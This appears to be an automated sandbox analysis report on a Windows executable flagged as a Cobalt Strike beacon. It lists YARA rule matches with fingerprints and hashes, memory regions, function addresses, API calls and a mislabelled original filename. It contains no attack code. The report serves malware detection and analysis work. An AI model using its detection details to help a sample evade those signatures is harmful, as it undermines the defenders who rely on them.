Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_3_01FC0020 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtProtectVirtualMemory,

0_3_01FC0020

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_3_01FC11E0	0_3_01FC11E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_3_01FC47C9	0_3_01FC47C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_3_01FC6A45	0_3_01FC6A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400757A8	0_2_00000001400757A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140093FEC	0_2_0000000140093FEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401AC024	0_2_00000001401AC024
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016009C	0_2_000000014016009C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140054158	0_2_0000000140054158
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013C149	0_2_000000014013C149
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401741F8	0_2_00000001401741F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401781F4	0_2_00000001401781F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400BC26C	0_2_00000001400BC26C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400FC280	0_2_00000001400FC280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B4288	0_2_00000001400B4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400802B4	0_2_00000001400802B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014015C2D8	0_2_000000014015C2D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014018C36C	0_2_000000014018C36C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140158370	0_2_0000000140158370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140084568	0_2_0000000140084568
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C0564	0_2_00000001400C0564
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F8588	0_2_00000001400F8588
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014012C5C0	0_2_000000014012C5C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401EC608	0_2_00000001401EC608
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400686C8	0_2_00000001400686C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401E06F0	0_2_00000001401E06F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140150750	0_2_0000000140150750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140004770	0_2_0000000140004770
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B0920	0_2_00000001400B0920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014006C940	0_2_000000014006C940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140080934	0_2_0000000140080934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401809A0	0_2_00000001401809A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014007CA78	0_2_000000014007CA78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014012CA64	0_2_000000014012CA64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140134A90	0_2_0000000140134A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140064AE8	0_2_0000000140064AE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140188B30	0_2_0000000140188B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140034B58	0_2_0000000140034B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140024B70	0_2_0000000140024B70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140170B9C	0_2_0000000140170B9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014002CBA0	0_2_000000014002CBA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400ACC78	0_2_00000001400ACC78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B8CF8	0_2_00000001400B8CF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401FCD94	0_2_00000001401FCD94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014014CD9C	0_2_000000014014CD9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014005CE14	0_2_000000014005CE14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401E0E78	0_2_00000001401E0E78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014009CE9C	0_2_000000014009CE9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140044F68	0_2_0000000140044F68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401E0F98	0_2_00000001401E0F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400A8FBC	0_2_00000001400A8FBC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140114FEC	0_2_0000000140114FEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401D502C	0_2_00000001401D502C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014008D14C	0_2_000000014008D14C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D5218	0_2_00000001400D5218
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140095274	0_2_0000000140095274
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400E5288	0_2_00000001400E5288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401D52C4	0_2_00000001401D52C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401752E8	0_2_00000001401752E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016D354	0_2_000000014016D354
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400A137C	0_2_00000001400A137C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014009937C	0_2_000000014009937C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D1378	0_2_00000001400D1378
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140185460	0_2_0000000140185460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014005145C	0_2_000000014005145C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014006D4C8	0_2_000000014006D4C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401254FC	0_2_00000001401254FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400CD508	0_2_00000001400CD508
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401D5538	0_2_00000001401D5538
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401F1530	0_2_00000001401F1530
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400DD6AC	0_2_00000001400DD6AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401416C0	0_2_00000001401416C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014010D6C0	0_2_000000014010D6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014004D7BC	0_2_000000014004D7BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140115850	0_2_0000000140115850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400FD888	0_2_00000001400FD888
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C1910	0_2_00000001400C1910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B5974	0_2_00000001400B5974
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140151994	0_2_0000000140151994
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014012DA14	0_2_000000014012DA14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013DA6C	0_2_000000014013DA6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014014DB20	0_2_000000014014DB20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401D5B10	0_2_00000001401D5B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401CDB40	0_2_00000001401CDB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140135B30	0_2_0000000140135B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140119B58	0_2_0000000140119B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D1B84	0_2_00000001400D1B84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400A1C28	0_2_00000001400A1C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016DC24	0_2_000000014016DC24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140105C80	0_2_0000000140105C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140081C80	0_2_0000000140081C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F5CA8	0_2_00000001400F5CA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140049CC4	0_2_0000000140049CC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140109D40	0_2_0000000140109D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140065D58	0_2_0000000140065D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014015DD64	0_2_000000014015DD64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F5DE0	0_2_00000001400F5DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140139F28	0_2_0000000140139F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140185F48	0_2_0000000140185F48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140051F98	0_2_0000000140051F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140159F88	0_2_0000000140159F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140112058	0_2_0000000140112058
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140162048	0_2_0000000140162048
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014004A11C	0_2_000000014004A11C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140152154	0_2_0000000140152154
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C21A1	0_2_00000001400C21A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400BA1CC	0_2_00000001400BA1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400621E4	0_2_00000001400621E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014015E200	0_2_000000014015E200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014008229C	0_2_000000014008229C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014014A2E4	0_2_000000014014A2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401DE314	0_2_00000001401DE314
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016E3B0	0_2_000000014016E3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140126490	0_2_0000000140126490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140132500	0_2_0000000140132500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401724E8	0_2_00000001401724E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400F6550	0_2_00000001400F6550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401FE5AC	0_2_00000001401FE5AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B65E4	0_2_00000001400B65E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140096610	0_2_0000000140096610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013E6C0	0_2_000000014013E6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400CA6EC	0_2_00000001400CA6EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401A2710	0_2_00000001401A2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C271C	0_2_00000001400C271C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014016A774	0_2_000000014016A774
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400E67A4	0_2_00000001400E67A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400927C8	0_2_00000001400927C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401DE848	0_2_00000001401DE848
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140156870	0_2_0000000140156870
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014006288C	0_2_000000014006288C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001401AA8BC	0_2_00000001401AA8BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014005A8E4	0_2_000000014005A8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140116954	0_2_0000000140116954
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400D29D8	0_2_00000001400D29D8

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 0000000140200750 appears 186 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 000000014003443C appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 00000001400064B0 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: String function: 000000014002C650 appears 79 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Yara signature match

Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23

Source: classification engine

Classification label: mal92.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,

0_2_0000000140054158

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014005876C GetModuleHandleW,GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,

0_2_000000014005876C

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

ReversingLabs: Detection: 25%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: uxtheme.dll	Jump to behavior
